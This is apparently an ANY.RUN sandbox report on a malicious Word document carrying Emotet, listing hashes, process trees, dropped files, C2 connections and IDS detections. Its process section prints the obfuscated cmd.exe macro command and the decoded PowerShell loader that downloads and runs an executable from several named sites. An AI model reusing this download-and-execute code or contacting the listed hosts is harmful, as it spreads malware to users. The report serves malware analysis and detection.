analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INV-201812183M298008.doc

Full analysis: https://app.any.run/tasks/1a718f7b-6ef4-4b47-96e4-1df22f711a7c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 17:46:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 13:25:00 2018, Last Saved Time/Date: Tue Dec 18 13:25:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 15, Security: 0
MD5:

0F8DFC72C1C2960E5919C59562F3BA48

SHA1:

21BC95FAD8AC646B2CE47AFC343514FBA611539D

SHA256:

97D426E298102724756E34E9D630B7D024B9F50E3CE1794A041FF33189570F79

SSDEEP:

1536:pq81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadwT4/3/g+a9:pq8GhDS0o9zTGOZD6EbzCdz/3/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3000)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2264)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3000)
    • Application was dropped or rewritten from another process

      • 150.exe (PID: 3660)
      • 150.exe (PID: 2980)
      • archivesymbol.exe (PID: 2716)
      • archivesymbol.exe (PID: 4024)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2176)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2176)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 2716)
    • Connects to CnC server

      • archivesymbol.exe (PID: 2716)
    • EMOTET was detected

      • archivesymbol.exe (PID: 2716)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3784)
    • Application launched itself

      • cmd.exe (PID: 3784)
    • Creates files in the user directory

      • powershell.exe (PID: 2176)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2176)
      • 150.exe (PID: 2980)
    • Starts itself from another location

      • 150.exe (PID: 2980)
    • Connects to unusual port

      • archivesymbol.exe (PID: 2716)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3000)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 13:25:00
ModifyDate: 2018:12:18 13:25:00
Pages: 1
Words: 2
Characters: 15
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 16
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 150.exe no specs 150.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INV-201812183M298008.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3784c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2264CmD /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2176powershell $KSv='DfV';$ohl=new-object Net.WebClient;$lIY='http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@');$svv='mba';$iro = '150';$FBp='Wjn';$kjh=$env:temp+'\'+$iro+'.exe';foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='ORc';If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='iGG';break;}}catch{}}$HTB='tWJ';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3660"C:\Users\admin\AppData\Local\Temp\150.exe" C:\Users\admin\AppData\Local\Temp\150.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2980"C:\Users\admin\AppData\Local\Temp\150.exe"C:\Users\admin\AppData\Local\Temp\150.exe
150.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
4024"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe150.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2716"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 741
Read events
1 252
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
3000WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA934.tmp.cvr
MD5:
SHA256:
3000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36CF7FFD.wmf
MD5:
SHA256:
3000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B6BD013.wmf
MD5:
SHA256:
2176powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GJQDIQX97V8UV4Q4V7NN.temp
MD5:
SHA256:
3000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\862C1CEC.wmfwmf
MD5:3B1C01DB4B268161CA0612F9E2918F59
SHA256:821F9383EA064E7E2F015FC25BEAB6CC05A67C05FB81BEA73530DB4621625B46
3000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F53D4DDA.wmfwmf
MD5:D324A020E26FC72EDF05645080608854
SHA256:A29B66E88BD99D0939BB2D9E538DB6ABFFA1D0BA82510238C7BDC0AC1EAAA00F
2980150.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:54FF16571EC7D020B82C50C6C9270161
SHA256:786FE8F22F3CF38FD4B93A4903C4E43A3D1A8B358E93599878CF5508601C424C
3000WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:BA46DB359E6D0B3418863C8F9169756B
SHA256:49DD8FFE46660D43BE29CF1C4CCB156E0DB3DD5E40C0AA84070B13DD05D9D3FD
3000WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A66FA7B6C40259F53F2967B38084B660
SHA256:9584370CB64A093AB4759892A75A1755D4AF838969C7A7F926E0D8ED0695F1F2
2176powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
9
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2716
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
2716
archivesymbol.exe
GET
181.197.253.133:8080
http://181.197.253.133:8080/
AR
suspicious
2716
archivesymbol.exe
GET
201.190.150.60:443
http://201.190.150.60:443/
AR
malicious
2716
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
2176
powershell.exe
GET
301
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd
DE
html
244 b
malicious
2176
powershell.exe
GET
200
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd/
DE
executable
124 Kb
malicious
2716
archivesymbol.exe
GET
200
70.55.69.202:7080
http://70.55.69.202:7080/
CA
binary
132 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2176
powershell.exe
144.76.122.10:80
www.ideenweberei.com
Hetzner Online GmbH
DE
suspicious
2716
archivesymbol.exe
201.190.150.60:443
ARLINK S.A.
AR
malicious
2716
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
2716
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious
2716
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
2716
archivesymbol.exe
81.150.17.158:8443
British Telecommunications PLC
GB
malicious
2716
archivesymbol.exe
181.197.253.133:8080
BVNET S.A.
AR
suspicious
2716
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious
2716
archivesymbol.exe
70.55.69.202:7080
Bell Canada
CA
suspicious

DNS requests

Domain
IP
Reputation
www.ideenweberei.com
  • 144.76.122.10
malicious

Threats

PID
Process
Class
Message
2176
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2176
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2176
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2176
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2176
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2716
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2716
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2716
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2716
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2716
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
5 ETPRO signatures available at the full report
No debug info